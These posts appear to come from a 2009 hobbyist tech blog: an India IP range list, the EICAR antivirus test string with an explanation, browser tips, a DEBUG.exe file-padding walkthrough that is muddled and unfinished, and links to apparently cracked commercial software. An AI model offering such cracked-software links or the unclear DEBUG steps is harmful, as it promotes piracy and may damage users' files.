Friday, July 3, 2009

IP Range Of INDIA

58.2.0.0   58.2.255.255
58.68.0.0    58.68.127.255
58.146.96.0   58.146.127.255
59.88.0.0   59.99.255.255
59.144.0.0   59.145.255.255
59.160.0.0   59.165.255.255
59.176.0.0   59.185.255.255
60.243.0.0   60.243.255.255
60.254.0.0   60.254.127.255
61.0.0.0   61.3.255.255
61.8.128.0   61.8.159.255
61.11.0.0   61.11.127.255
61.12.0.0   61.12.127.255
61.14.4.0   61.14.6.63
61.14.6.128   61.14.6.255
61.14.12.0   61.14.12.7
61.14.14.64   61.14.14.255
61.14.15.32   61.14.15.63
61.14.18.0   61.14.18.127
61.14.18.200   61.14.18.207
61.14.20.128   61.14.20.255
61.14.22.56   61.14.22.63
61.14.24.128   61.14.24.255
61.14.31.64   61.14.31.127
61.14.31.192   61.14.31.255
61.16.128.0   61.17.255.255
61.95.128.0   61.95.255.255
61.246.0.0   61.246.255.255
61.247.224.0   61.247.255.255
63.80.47.0   63.80.47.255
63.109.245.56   63.109.245.71
63.109.245.80   63.109.245.119
63.109.246.128   63.109.246.255
63.109.249.24   63.109.249.39
63.109.249.48   63.109.249.63
63.171.107.224   63.171.107.255
63.175.182.160   63.175.182.191
63.219.7.0   63.219.7.255
63.240.55.0   63.240.55.255
64.14.52.32   64.14.52.63
64.14.202.0   64.14.202.15
64.35.33.64   64.35.33.95
64.37.64.0   64.37.64.31
64.37.68.128   64.37.68.159
64.37.82.128   64.37.82.159
64.37.88.224   64.37.88.255
64.37.91.128   64.37.91.191
64.37.91.224   64.37.91.255
64.37.93.64   64.37.93.127
64.37.94.96   64.37.94.127
64.37.102.0   64.37.102.63
64.37.108.64   64.37.108.95
64.37.111.0   64.37.111.255
64.37.112.224   64.37.112.255
64.41.252.0   64.41.252.63
64.74.118.0   64.74.118.255
64.77.15.176   64.77.15.191
64.77.29.248   64.77.29.255
64.77.37.24   64.77.37.31
64.77.37.224   64.77.37.247
64.77.39.112   64.77.39.119
64.77.39.128   64.77.39.135
64.77.47.64   64.77.47.95
64.89.42.112   64.89.42.127
64.93.78.0   64.93.78.255
64.106.157.50   64.106.157.59
64.106.200.60   64.106.200.69
64.132.162.192   64.132.162.207
64.225.143.240   64.225.143.254
64.235.47.153   64.235.47.161
64.241.203.32   64.241.203.47
65.98.67.72   65.98.67.79
65.98.88.168   65.98.88.175
65.99.249.16   65.99.249.31
65.160.142.128   65.160.142.255
65.175.64.0   65.175.64.255
65.175.77.128   65.175.77.143
65.175.97.128   65.175.97.255
65.175.124.0   65.175.124.127
65.182.162.60   65.182.162.99
65.182.162.221   65.182.162.251
66.35.192.32   66.35.192.47
66.70.20.10   66.70.20.19
66.96.212.2   66.96.212.99
66.96.222.2   66.96.222.14
66.96.231.170  66.96.231.199
66.96.244.145   66.96.244.154
66.96.250.120   66.96.250.139
66.128.48.112   66.128.48.127
66.165.85.128   66.165.85.255
66.165.106.0   66.165.106.31
66.197.167.80   66.197.167.199
66.197.173.50   66.197.173.99
66.197.173.215   66.197.173.254
66.201.66.192   66.201.66.255
66.201.94.0   66.201.94.31
66.201.109.128   66.201.109.255
67.59.182.248   67.59.182.255
67.203.0.192   67.203.0.199
67.219.103.40   67.219.103.47
67.222.137.34   67.222.137.41
67.225.181.155   67.225.181.158
69.13.105.42   69.13.105.57
69.16.156.0   69.16.156.7
69.16.233.114   69.16.233.121
69.30.254.56   69.30.254.71
69.46.182.160   69.46.182.167
69.72.142.216   69.72.142.223
69.72.214.240   69.72.214.247
69.72.242.8   69.72.242.15
69.72.244.88   69.72.244.95
69.162.79.56   69.162.79.63
69.162.85.224   69.162.85.231
69.162.108.160   69.162.108.167
69.162.113.64   69.162.113.71
70.224.176.208   70.224.176.223
72.29.0.0   72.29.0.31
72.29.1.224   72.29.1.255
72.29.13.0   72.29.13.255
72.29.17.192   72.29.17.223
72.29.21.128   72.29.21.255
72.29.23.128   72.29.23.159
72.29.23.224   72.29.23.255
72.29.26.0   72.29.26.255
74.127.39.0   74.127.39.127
74.127.42.32   74.127.42.63
74.127.60.32   74.127.60.63
76.12.129.144   76.12.129.151
76.12.217.104   76.12.217.111
76.12.248.128   76.12.248.143
78.24.201.208   78.24.201.223
78.24.202.104   78.24.202.111
78.24.203.104   78.24.203.111
78.24.206.104   78.24.206.111
78.129.161.0   78.129.161.255
80.247.138.16   80.247.138.71
80.254.160.16   80.254.160.23
80.255.41.128   80.255.41.135
83.136.5.32   83.136.5.63
87.249.83.0   87.249.83.255
89.248.163.0   89.248.163.31
92.48.109.0   92.48.109.255
93.93.100.0   93.93.100.63
110.5.72.0   110.5.79.255
110.50.32.0   110.50.63.255
110.76.160.0   110.76.175.255
110.93.32.0   110.93.63.255
110.172.16.0   110.172.31.255
110.172.52.0   110.172.55.255
110.172.128.0   110.172.191.255
110.224.0.0   110.227.255.255
110.234.0.0   110.235.255.255
112.79.0.0   112.79.255.255
112.110.0.0   112.110.255.255
112.121.48.0   112.121.63.255
112.133.192.0   112.133.255.255
112.137.48.0   112.137.55.255
112.196.0.0   112.196.191.255
113.11.224.0   113.11.231.255
113.19.0.0   113.19.255.255
113.30.128.0   113.30.255.255
113.193.0.0   113.193.255.255
113.197.104.0   113.197.105.255
113.197.107.0   113.197.107.255
113.212.64.0   113.212.95.255
114.30.72.0   114.30.79.255
114.31.128.0   114.31.191.255
114.31.224.0   114.31.239.255
114.31.248.0   114.31.255.255
114.69.224.0   114.69.255.255
114.141.64.0   114.141.71.255
114.142.136.0   114.142.143.255
114.143.0.0   114.143.255.255
115.69.80.0   115.69.95.255
115.69.128.0   115.69.159.255
115.69.240.0   115.69.255.255
115.96.0.0   115.99.255.255
115.108.0.0   115.119.255.255
115.124.104.0   115.124.109.255
115.124.112.0   115.124.127.255
115.160.192.0   115.160.255.255
115.178.96.0   115.178.103.255
115.184.0.0   115.185.255.255
115.187.0.0   115.187.15.255
115.187.32.0   115.187.63.255
115.240.0.0   115.255.255.255
116.50.0.0   116.50.7.255
116.50.64.0   116.50.127.255
116.66.140.0   116.66.141.255
116.66.144.0   116.66.159.255
116.68.64.0   116.68.127.255
116.68.240.0   116.68.247.255
116.72.0.0   116.75.255.255
116.90.240.0   116.90.255.255
116.119.0.0   116.119.255.255
116.193.128.0   116.193.143.255
116.193.160.0   116.193.167.255
116.199.168.0   116.199.175.255
116.212.176.0   116.212.183.255
116.214.24.0   116.214.31.255
116.214.114.0   116.214.114.255
117.55.240.0   117.55.247.255
117.96.0.0   117.99.255.255
117.104.232.0   117.104.239.255
117.192.0.0   117.255.255.255
118.67.224.0   118.67.255.255
118.88.0.0   118.88.7.255
118.91.176.0   118.91.191.255
118.91.232.0   118.91.239.255
118.94.0.0   118.95.255.255
118.102.128.0   118.102.255.255
119.31.160.0   119.31.175.255
119.42.152.0   119.42.159.255
119.43.0.0   119.43.255.255
119.82.64.0   119.82.127.255
119.151.0.0   119.151.255.255
119.160.192.0   119.160.199.255
119.226.0.0   119.227.255.255
119.235.48.0   119.235.63.255
119.252.144.0   119.252.159.255
119.252.192.0   119.252.223.255
120.29.232.0   120.29.239.255
120.56.0.0   120.63.255.255
120.72.88.0   120.72.95.255
120.88.32.0   120.88.47.255
120.89.72.0   120.89.79.255
120.138.96.0   120.138.127.255
120.138.192.0   120.138.255.255
121.50.0.0   121.50.15.255
121.58.168.0   121.58.175.255
121.101.144.0   121.101.159.255
121.240.0.0   121.247.255.255
122.50.128.0   122.50.255.255
122.98.0.0   122.98.255.255
122.144.16.0   122.144.23.255
122.160.0.0   122.191.255.255
122.200.16.0   122.200.23.255
122.248.160.0   122.248.160.87
122.252.224.0   122.252.255.255
122.255.72.0   122.255.79.255
123.50.160.0   123.50.191.255
123.100.234.0   123.100.234.255
123.108.32.0   123.108.63.255
123.108.200.0   123.108.207.255
123.108.224.0   123.108.231.255
123.136.16.0   123.136.23.255
123.136.128.0   123.136.255.255
123.176.32.0   123.176.47.255
123.201.0.0   123.201.255.255
123.236.0.0 123.239.255.255
123.242.240.0   123.242.255.255
123.252.128.0   123.252.255.255
123.255.248.0   123.255.255.255
124.4.0.0   124.4.255.255
124.7.0.0   124.7.255.255
124.30.0.0   124.30.255.255
124.47.128.0   124.47.191.255
124.123.0.0   124.125.255.255
124.153.64.0   124.153.127.255
124.247.192.0   124.247.255.255
124.253.0.0   124.253.255.255
125.16.0.0   125.23.255.255
125.62.96.0   125.62.223.255
125.63.64.0   125.63.127.255
125.99.0.0   125.99.255.255
125.252.226.0   125.252.226.255
134.159.98.192   134.159.98.223
134.159.111.72   134.159.111.79
134.159.141.0   134.159.141.15
134.159.142.160   134.159.142.191
134.159.146.0   134.159.146.31
134.159.146.48   134.159.146.63
134.159.165.80   134.159.165.95
134.159.165.104   134.159.165.119
134.159.168.128   134.159.168.255
144.16.0.0   144.16.255.255
157.227.0.0   157.227.255.255
158.144.0.0   158.144.255.255
163.122.0.0   163.122.255.255
164.100.0.0   164.100.255.255
164.164.0.0   164.164.255.255
192.109.194.0   192.109.194.255
192.131.90.0   192.131.91.255
192.136.141.0   192.136.143.255
192.151.129.0   192.151.129.255
194.117.103.3   194.117.103.3
194.117.103.5   194.117.103.5
194.117.103.9   194.117.103.9
194.117.103.47   194.117.103.47
194.117.103.65   194.117.103.65
194.117.103.81   194.117.103.81
194.117.103.88   194.117.103.88
194.117.103.94   194.117.103.94
194.117.103.121  194.117.103.121
194.117.103.130   194.117.103.130
194.117.103.133   194.117.103.133
194.117.103.142   194.117.103.142
194.117.103.147   194.117.103.147
194.117.103.169   194.117.103.169
194.117.103.172   194.117.103.172
194.117.103.180   194.117.103.180
194.117.103.212    194.117.103.212
194.117.103.220   194.117.103.220
194.117.103.222   194.117.103.222
194.117.103.231   194.117.103.231
194.117.103.236   194.117.103.238
194.117.103.243   194.117.103.243
194.117.103.245   194.117.103.246
194.117.103.248   194.117.103.250
195.112.167.28   195.112.167.31
195.112.167.192  195.112.167.195
195.112.167.236   195.112.167.239
195.112.167.248   195.112.167.251
195.112.177.8   195.112.177.11
195.112.177.24   195.112.177.27
195.112.177.56   195.112.177.75
195.112.177.92   195.112.177.95
195.112.177.108  195.112.177.111
195.112.177.132   195.112.177.135
195.112.177.184   195.112.177.187
195.112.177.228   195.112.177.231
195.112.182.69  195.112.182.69
196.1.1.0   196.1.1.255
196.1.68.0   196.1.68.255
196.1.104.0   196.1.106.255
196.1.108.0   196.1.111.255
196.1.113.0   196.1.114.255
196.1.134.0   196.1.134.255
196.3.65.0   196.3.65.255
196.12.32.0   196.12.63.255
196.15.16.0   196.15.31.255
199.106.210.8   199.106.210.31
199.106.212.32   199.106.212.47
202.1.120.0   202.1.127.255
202.3.75.0   202.3.77.255
202.3.80.0   202.3.95.255
202.3.112.0   202.3.127.255
202.4.25.0   202.4.25.255
202.6.80.0   202.6.80.255
202.6.99.0   202.6.99.255
202.7.52.0   202.7.59.255
202.9.112.0   202.9.207.255
202.12.16.0   202.12.16.255
202.12.101.0   202.12.101.255
202.14.69.0   202.14.69.255
202.14.72.0   202.14.72.255
202.21.129.0   202.21.129.255
202.21.134.0   202.21.135.255
202.21.147.0  202.21.147.255
202.27.9.0   202.27.9.255
202.38.180.0   202.38.183.255
202.40.6.0   202.40.6.255
202.41.0.0   202.41.13.255
202.41.16.0   202.41.129.255
202.41.131.0   202.41.133.255
202.41.148.0   202.41.151.255
202.41.192.0   202.41.192.255
202.41.204.0   202.41.207.255
202.41.224.0   202.41.235.191
202.41.235.224  202.41.239.255
202.43.67.0   202.43.67.255
202.44.56.0   202.44.59.255
202.45.6.0   202.45.7.255
202.45.10.0   202.45.11.255
202.46.19.0   202.46.19.255
202.46.22.0   202.46.23.255
202.46.192.0   202.46.223.255
202.47.124.0   202.47.124.255
202.47.127.0   202.47.127.255
202.52.2.0   202.52.3.255
202.53.8.0   202.53.15.255
202.53.64.0   202.53.111.255
202.54.0.0   202.55.31.255
202.56.0.0   202.56.3.255
202.56.96.0   202.56.127.255
202.56.192.0   202.56.255.255
202.58.102.0   202.58.103.255
202.58.120.0   202.58.123.255
202.58.125.0   202.58.125.255
202.58.127.0   202.58.127.255
202.58.132.0   202.58.135.255
202.59.2.0   202.59.3.255
202.60.60.0   202.60.63.255
202.60.128.0   202.60.159.255
202.60.208.0   202.60.223.255
202.61.8.0   202.61.11.255
202.62.64.0   202.62.95.255
202.62.116.0   202.62.117.255
202.62.224.0   202.62.239.255
202.62.252.0   202.62.252.255
202.63.96.0   202.63.127.255
202.63.160.0   202.63.191.255
202.63.252.0   202.63.253.255
202.65.128.0   202.65.159.255
202.67.4.0   202.67.7.255
202.68.128.0   202.68.159.255
202.70.192.0   202.70.207.255
202.71.128.0   202.71.159.255
202.72.248.0   202.72.251.255
202.75.192.0   202.75.207.255
202.77.137.0   202.77.137.255
202.78.160.0   202.78.175.255
202.78.232.0   202.78.239.255
202.78.251.0   202.78.251.255
202.79.248.0   202.79.251.255
202.80.48.0   202.80.63.255
202.81.128.0   202.81.159.255
202.81.192.0   202.81.207.255
202.83.16.0   202.83.63.255
202.86.4.0   202.86.7.255
202.86.251.0   202.86.251.255
202.87.32.0   202.87.63.255
202.88.128.0   202.88.191.255
202.88.208.0   202.88.255.255
202.89.64.0   202.89.79.255
202.89.104.0   202.89.111.255
202.89.118.0   202.89.119.255
202.90.96.0   202.90.111.255
202.90.192.0   202.90.192.255
202.90.204.0   202.90.204.255
202.91.64.0   202.91.95.255
202.91.132.0   202.91.143.255
202.92.8.0   202.92.15.255
202.92.224.0   202.92.239.255
202.93.154.0   202.93.154.255
202.95.251.0   202.95.251.255
202.122.16.0   202.122.23.255
202.122.134.0   202.122.135.255
202.123.32.0   202.123.47.255
202.129.196.0   202.129.203.255
202.129.209.0   202.129.213.255
202.129.215.0   202.129.215.255
202.129.219.0   202.129.219.255
202.129.239.0   202.129.241.255
202.130.40.0   202.130.43.255
202.131.96.0   202.131.159.255
202.133.48.0   202.133.63.255
202.134.59.0   202.134.59.255
202.134.144.0   202.134.207.255
202.136.248.0   202.136.251.255
202.137.208.0   202.137.223.255
202.137.232.0   202.137.239.255
202.137.248.0   202.137.251.255
202.138.96.0   202.138.127.255
202.140.32.0   202.140.63.255
202.140.128.0  202.140.159.255
202.141.0.0   202.141.159.255
202.142.0.0   202.142.7.255
202.142.64.0   202.142.127.255
202.143.0.0   202.143.1.255
202.143.4.0   202.143.7.255
202.144.0.0   202.144.127.255
202.146.192.0   202.146.207.255
202.148.192.0   202.148.207.255
202.149.32.0   202.149.63.255
202.149.192.0   202.149.223.255
202.150.4.0   202.150.7.255
202.151.128.0   202.151.159.255
202.153.32.0   202.153.47.255
202.154.160.0   202.154.175.255
202.157.64.0   202.157.95.255
202.157.190.0   202.157.191.255
202.159.192.0   202.159.255.255
202.160.160.0   202.160.175.255
202.160.239.0   202.160.239.255
202.162.48.0   202.162.63.255
202.162.188.0   202.162.191.255
202.162.224.0   202.162.255.255
202.164.24.0   202.164.25.255
202.164.32.0   202.164.63.255
202.164.128.0   202.164.159.255
202.165.62.0   202.165.63.255
202.166.184.0   202.166.184.255
202.168.88.0   202.168.91.255
202.168.94.0   202.168.94.255
202.172.7.0   202.172.7.255
202.174.5.0   202.174.5.255
202.174.92.0   202.174.95.255
202.174.120.0   202.174.120.255
202.174.122.0   202.174.127.255
202.174.148.136   202.174.148.143
202.177.44.0   202.177.47.255
202.177.128.0   202.177.191.255
202.177.224.0   202.177.255.255
202.179.64.0   202.179.95.255
202.183.64.0   202.183.79.255
202.189.224.0   202.189.255.255
202.191.64.0   202.191.95.255
202.242.2.111   202.242.2.111
203.8.109.0   203.8.109.255
203.12.222.0   203.12.223.255
203.13.168.0  203.13.171.255
203.14.18.0  203.14.18.255
203.16.165.0  203.16.165.255
203.18.26.0  203.18.26.255
203.18.137.0   203.18.137.255
203.19.3.0   203.19.3.255
203.21.7.0   203.21.7.255
203.23.186.0   203.23.186.255
203.24.87.0   203.24.87.255
203.27.235.0   203.27.235.255
203.32.4.0   203.32.5.255
203.32.221.0  203.32.221.255
203.33.198.0   203.33.199.255
203.34.116.0   203.34.117.255
203.55.160.0   203.55.160.255
203.55.173.0   203.55.173.255
203.56.241.0   203.56.241.255
203.56.255.224   203.56.255.239
203.62.172.0   203.62.175.255
203.76.128.0   203.76.143.255
203.76.168.0   203.76.171.255
203.76.176.0   203.76.191.255
203.77.177.0   203.77.177.255
203.77.192.0   203.77.207.255
203.78.4.0   203.78.4.255
203.78.128.0   203.78.159.255
203.78.208.0   203.78.223.255
203.82.4.0  203.82.7.255
203.82.218.0   203.82.218.255
203.82.250.0   203.82.251.255
203.83.248.0   203.83.249.255
203.86.96.0   203.86.127.255
203.88.0.0   203.88.31.255
203.88.128.0   203.88.159.255
203.89.4.0   203.89.4.255
203.89.132.0   203.89.132.255
203.89.134.0   203.89.135.255
203.89.151.0   203.89.155.255
203.90.4.0   203.90.5.255
203.90.64.0   203.90.127.255
203.91.192.0   203.91.223.255
203.92.32.0   203.92.63.255
203.92.192.0   203.92.207.255
203.94.192.0   203.94.255.255
203.98.96.0   203.98.127.255
203.98.193.64   203.98.193.127
203.98.193.224   203.98.193.239
203.98.194.128   203.98.195.23
203.98.195.32   203.98.195.39
203.98.205.128   203.98.205.159
203.98.205.176   203.98.205.207
203.98.207.64   203.98.207.79
203.98.207.160   203.98.207.191
203.98.210.112   203.98.210.127
203.98.213.208   203.98.213.255
203.99.40.0   203.99.47.255
203.99.192.0   203.99.223.255
203.100.57.0   203.100.57.255
203.100.64.0   203.100.79.255
203.101.0.0   203.101.127.255
203.104.16.0   203.104.23.255
203.105.160.0   203.105.191.255
203.109.64.0   203.109.127.255
203.110.80.0   203.110.95.255
203.110.208.0   203.110.223.255
203.110.240.0   203.110.247.255
203.111.248.0   203.111.251.255
203.112.128.0   203.112.159.255
203.114.232.0   203.114.235.255
203.114.240.0   203.114.243.255
203.115.64.0   203.115.127.255
203.119.49.0   203.119.50.255
203.122.0.0   203.122.63.255
203.123.32.0   203.123.47.255
203.123.128.0   203.123.191.255
203.123.247.192   203.123.247.195
203.124.16.0   203.124.23.255
203.124.128.0   203.124.175.255
203.124.192.0   203.124.255.255
203.129.192.0   203.129.255.255
203.132.128.0   203.132.159.255
203.132.208.0   203.132.223.255
203.134.192.0   203.134.231.255
203.134.248.0   203.134.251.255
203.142.220.0   203.142.220.255
203.143.176.0   203.143.191.255
203.144.96.0   203.144.127.255
203.145.128.0   203.145.191.255
203.153.32.0   203.153.48.255
203.153.52.0   203.153.55.255
203.153.210.0   203.153.211.255
203.158.64.0   203.158.95.255
203.160.129.0   203.160.129.255
203.160.136.0   203.160.136.255
203.160.138.0   203.160.139.255
203.161.54.0   203.161.63.255
203.163.95.24   203.163.95.31
203.163.224.0   203.163.255.255
203.170.25.0   203.170.25.255
203.170.48.0   203.170.48.255
203.170.60.0   203.170.63.255
203.171.209.0   203.171.211.255
203.171.222.0   203.171.222.255
203.171.240.0   203.171.247.255
203.174.6.0   203.174.6.255
203.175.4.0   203.175.7.255
203.175.176.0   203.175.177.255
203.175.180.0   203.175.185.255
203.176.112.0   203.176.113.255
203.185.188.0   203.185.188.255
203.185.191.0   203.185.191.255
203.187.128.0   203.187.159.255
203.187.192.0   203.187.255.255
203.188.224.0   203.188.231.255
203.189.5.0   203.189.5.255
203.189.24.0   203.189.24.255
203.189.90.0   203.189.92.255
203.189.176.0   203.189.183.255
203.190.128.0   203.190.159.255
203.190.216.0   203.190.216.255
203.190.248.0   203.190.248.255
203.191.5.0   203.191.5.255
203.191.34.0   203.191.35.255
203.192.192.0   203.192.255.255
203.193.128.0   203.193.191.255
203.194.96.0   203.194.111.255
203.196.128.0   203.197.255.255
203.199.0.0   203.200.255.255
203.201.60.0   203.201.63.255
203.201.192.0   203.201.255.255
203.207.62.0   203.207.63.255
203.210.92.0   203.210.95.255
203.212.24.0   203.212.27.255
203.212.64.0   203.212.79.255
203.212.192.0   203.212.255.255
203.215.51.0   203.215.55.255
203.222.166.136   203.222.166.143
203.222.171.176   203.222.171.191
203.222.187.128   203.222.187.167
203.222.187.192   203.222.187.255
203.223.176.0   203.223.176.255
203.223.188.0   203.223.191.255
204.176.100.240   204.176.100.255
205.134.225.128   205.134.225.135
205.138.24.128   205.138.24.255
205.214.74.24   205.214.74.39
205.214.74.48   205.214.74.63
205.214.74.80   205.214.74.95
205.214.83.24   205.214.83.31
205.234.150.32   205.234.150.39
205.234.172.192   205.234.172.255
205.234.179.144   205.234.179.151
206.73.45.0   206.73.45.127
206.182.89.128   206.182.89.191
206.182.192.112   206.182.192.127
206.222.7.224   206.222.7.231
206.225.94.243   206.225.94.250
207.198.105.198   207.198.105.211
207.210.211.192   207.210.211.215
207.210.233.0   207.210.233.255
208.112.115.16   208.112.115.23
208.115.109.0   208.115.109.63
208.123.68.64   208.123.68.87
208.149.96.0   208.149.99.255
209.16.208.48   209.16.208.63
209.18.84.220   209.18.84.229
209.51.196.160   209.51.196.167
209.51.198.112   209.51.198.119
209.51.210.48   209.51.210.63
209.67.40.16   209.67.40.31
209.85.12.96   209.85.12.127
209.85.19.224   209.85.19.255
209.85.53.160   209.85.53.175
209.95.103.160   209.95.103.191
209.182.35.64   209.182.35.127
209.182.60.0   209.182.60.255
209.182.61.128   209.182.61.255
209.190.29.16   209.190.29.23
209.190.31.96   209.190.31.103
209.190.88.0   209.190.88.255
209.197.225.48   209.197.225.55
209.200.228.61   209.200.228.69
209.203.226.64   209.203.226.95
209.227.223.160   209.227.223.175
209.250.147.224   209.250.147.255
210.5.200.0   210.5.203.255
210.5.209.192   210.5.209.207
210.5.209.224   210.5.209.231
210.7.64.0   210.7.95.255
210.18.0.0   210.18.191.255
210.56.96.0   210.56.127.255
210.89.32.0   210.89.63.255
210.176.32.32   210.176.32.63
210.176.32.96   210.176.44.63
210.176.44.160   210.176.47.255
210.210.0.0   210.210.127.255
210.211.128.0   210.212.255.255
210.214.0.0   210.214.255.255
212.63.167.124   212.63.167.127
212.63.181.64   212.63.181.67
212.63.181.80   212.63.181.91
212.63.181.108   212.63.181.111
212.63.181.120   212.63.181.131
212.63.181.136   212.63.181.139
212.63.181.152   212.63.181.163
212.63.181.172   212.63.181.179
212.63.181.188   212.63.181.195
212.63.181.220   212.63.181.223
212.63.181.248   212.63.181.251
212.63.182.54   212.63.182.54
212.63.182.76   212.63.182.79
212.63.183.6   212.63.183.6
212.63.183.12   212.63.183.12
212.63.183.17   212.63.183.17
212.63.183.24   212.63.183.25
212.63.183.34   212.63.183.35
212.63.183.41   212.63.183.41
212.63.183.43   212.63.183.43
212.63.183.45   212.63.183.45
212.63.183.54   212.63.183.54
212.63.183.70   212.63.183.70
212.63.183.72   212.63.183.73
212.63.183.78   212.63.183.79
212.63.183.83   212.63.183.84
212.63.183.88   212.63.183.88
212.63.183.90   212.63.183.91
212.63.183.94   212.63.183.94
212.63.183.128   212.63.183.131
212.63.183.136   212.63.183.151
212.63.183.160   212.63.183.167
212.63.183.200   212.63.183.203
212.63.183.232   212.63.183.235
212.63.183.240   212.63.183.243
212.63.183.252   212.63.183.255
212.162.195.0   212.162.195.51
212.162.195.56   212.162.195.59
212.162.196.0   212.162.196.95
212.165.133.0   212.165.133.255
212.165.136.0   212.165.139.255
212.165.146.24   212.165.146.31
212.165.146.120   212.165.146.127
216.6.64.0   216.6.71.255
216.7.173.112   216.7.173.127
216.15.130.160   216.15.130.175
216.15.133.192   216.15.133.223
216.15.154.160   216.15.154.191
216.15.157.0   216.15.157.31
216.15.157.224   216.15.157.255
216.15.160.0   216.15.160.127
216.15.168.0   216.15.168.63
216.15.179.0   216.15.179.31
216.15.179.160   216.15.179.191
216.15.179.226   216.15.179.255
216.15.182.96   216.15.182.127
216.15.192.64   216.15.192.127
216.15.200.128   216.15.200.191
216.15.204.128   216.15.204.159
216.15.223.64   216.15.223.91
216.15.225.128   216.15.225.255
216.15.228.128   216.15.228.255
216.15.230.128   216.15.230.255
216.15.231.128   216.15.231.255
216.15.237.0   216.15.237.127
216.15.239.0   216.15.239.127
216.38.56.88   216.38.56.95
216.38.56.248   216.38.56.255
216.40.100.104   216.40.100.111
216.67.245.96   216.67.245.103
216.131.114.232   216.131.114.239
216.136.178.16   216.136.178.31
216.144.239.64   216.144.239.95
216.151.162.56   216.151.162.63
216.151.162.160   216.151.162.167
216.151.162.184   216.151.162.191
216.151.163.32   216.151.163.63
216.187.101.128   216.187.101.255
216.198.194.96   216.198.194.127
216.198.194.160   216.198.194.191
216.198.199.64   216.198.199.95
216.198.201.128   216.198.201.225
216.198.202.128   216.198.202.255
216.198.203.128   216.198.203.255
216.198.204.96   216.198.204.127
216.198.210.0   216.198.210.255
216.198.217.0   216.198.217.63
216.198.222.128   216.198.222.255
216.198.235.160   216.198.235.191
216.198.236.0   216.198.236.127
216.198.237.0   216.198.237.127
216.198.241.128   216.198.241.255
216.198.244.8   216.198.244.15
216.198.244.48   216.198.244.55
216.198.251.0   216.198.251.31
216.198.251.96   216.198.251.127
216.198.251.160   216.198.251.191
216.218.236.64   216.218.236.95
216.236.200.136   216.236.200.167
216.236.201.128   216.236.201.135
216.236.203.0   216.236.203.255
216.237.117.128   216.237.117.255
216.245.211.0   216.245.211.7
218.100.48.0   218.100.49.255
218.248.0.0   218.248.255.255
219.64.0.0   219.65.255.255
219.83.128.0   219.83.255.255
219.90.96.0   219.90.111.255
219.91.128.0   219.91.255.255
220.156.184.0   220.156.191.255
220.224.0.0   220.227.255.255
221.120.104.0   221.120.111.255
221.128.128.0   221.128.255.255
221.134.0.0   221.135.255.255

Saturday, June 20, 2009

YOUTUBE High Quality Videos

Now You Can See Youtube Videos In HQ & also Download In .flv , .3gp , .mp4

wwe

for that you have to use Latest Version of Mozilla Firefox  --> DOWNLOAD

Powerful feature of mozilla firefox is his add-ons...

To See HQ videos in you tube first add Greasemonkey add-ons --> DOWNLOAD

restart your firefox.

now DOWNLOAD this ...

click on INSTALL ...

you will now able to see youtube HQ videos ...also you can download...

Thursday, June 18, 2009

javascript

These days me doing website project so me looking for some JAVA script which makes website  attractive also easy to use for users...!!

i found one awsome website which provides amazing javascript ....

Follow Below link For javascripts::

http://www.dhteumeuleu.com/

just copy javascript & attach with your website project...

enjoy....!!!

Next generation Websites uses AJAX , Jquery...so on this some high rated websites listed below.

1) http://ajaxian.com/

2) http://www.ajaxrain.com/

3) http://www.dottony.com/

Friday, June 12, 2009

Test your Anti-Virus

copy below text into your text file and save as .com or .exe
----------------------------------------------------------------------
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
----------------------------------------------------------------------

Dont Worry.....it will not effect your computer....!!!

this code is called EICAR test file

The EICAR test file (official name: EICAR Standard Anti-Virus Test File)
is a file, developed by the European Institute for Computer Antivirus
Research,to test the response of computer antivirus (AV) programs.
The file is simply a text file of either 68 or 70 bytes that is a
legitimate executable file called a COM file that can run by Microsoft
operating systems and some work-alikes (except for 64-bit due to 16-bit
limitations), including OS/2. When executed, it will print "EICAR-
STANDARD-ANTIVIRUS-TEST-FILE!" and then stop. The test string was
specifically engineered to consist of ASCII human-readable characters,
easily created using a standard computer keyboard.It makes use of
self-modifying code to work around technical issues that this
constraint makes on the execution of the test string.

Saturday, June 6, 2009

Firefox Crashes when Adding Images in Wordpress

Firefox Crashes When Adding Images In Wordpress


Recently Wordpress users have been experiencing issues with firefox wherein every time you try to add an image to your post firefox crashes! This is a very painful experience for wordpress users.

The problem is being cause by Google Gears, a plugin that speeads up wordpress by locally storing common components and then calling them when necessary. This issue arised when GEARS updated to its latest version.

To fix this issue, you need to disable GEARS in your add-ons menu. You do not need to remove it as this bug would probably be fixed on the next update.

Latest Softwares

Latest Softwares


1) Music Maker 15 Premium Edition --->> DOWNLOAD

file size :113 MB

MAGIX Music Maker 15 Premium is perfect for composing music: stunning songs, experimental beats, and exciting soundtracks!
Music Maker Premium offers everything you need to make your own music:
A massive sound archive featuring over 3,500 sounds and loops
Ability to record on 96 audio and MIDI tracks
Mixing console including 5.1 Surround mixing, effects and remix tools, analog synthesizers
Burn CDs in the official standard of music labels and the record industry.

2) Limewire Pro 5.1.3 Final Full Register Version --->> DOWNLOAD


File Size: 18 MB

LimeWire - The Fastest P2P File Sharing Program on the Planet, running on the Gnutella Network. It is open standard software running on an open protocol, free for the public to use. LimeWire allows you to share any file such as.mp3s, .avis, jpgs, tiffs, etc., allows you to search for multiple files at the same time, available in several different languages, and is most famous for its ease-of-use and cross-platform compatibility. Limewire is written in Java, and will run on Windows, Macintosh, Linux, Solaris, and other computing platforms.

3) Internet Download Manager --->> DOWNLOAD

Internet Download Manager supports proxy servers, ftp and http protocols, firewalls, redirects, cookies, authorization, MP3 audio and MPEG video content processing. IDM integrates seamlessly into Microsoft Internet Explorer, Netscape, MSN Explorer, AOL, Opera, Mozilla, Mozilla Firefox, Mozilla Firebird, Avant Browser, MyIE2, and all other popular browsers to automatically handle your downloads. You can also drag and drop files, or use Internet Download Manager from command line. Internet Download Manager can dial your modem at the set time, download the files you want, then hang up or even shut down your computer when it's done.




Increase or Decrease File Size

Increase File Size


Let Try This...

A Image File In D drive name "gun.jpeg"....

FILE INFO: 274 kb

Now Lets Sart::

1) open Start ---> RUN ---> type "CMD"
2) Type A Path Where Your File Located..

> D:/>

3)

> D:/> DEBUG gun.jpg

> -RCX    (type)          "Register CX "
CX 4A64                 "For This HEX NUMBER check Below CALCULATION"
:4000   (type)
> -RBX (type)             "Register BX"
BX 0004
:009c   (type)        "For This HEX NUMBER check Below CALCULATION"
> w (type)

> q  (type)

Now Check Your Original File.....

You Done It....!!!



CALCULATION


my file size is 274 KB
274 KB = 280576 bytes  (1 KB  = 1024 bytes )

Now Lets Increase File Size ..hhmm......1MB

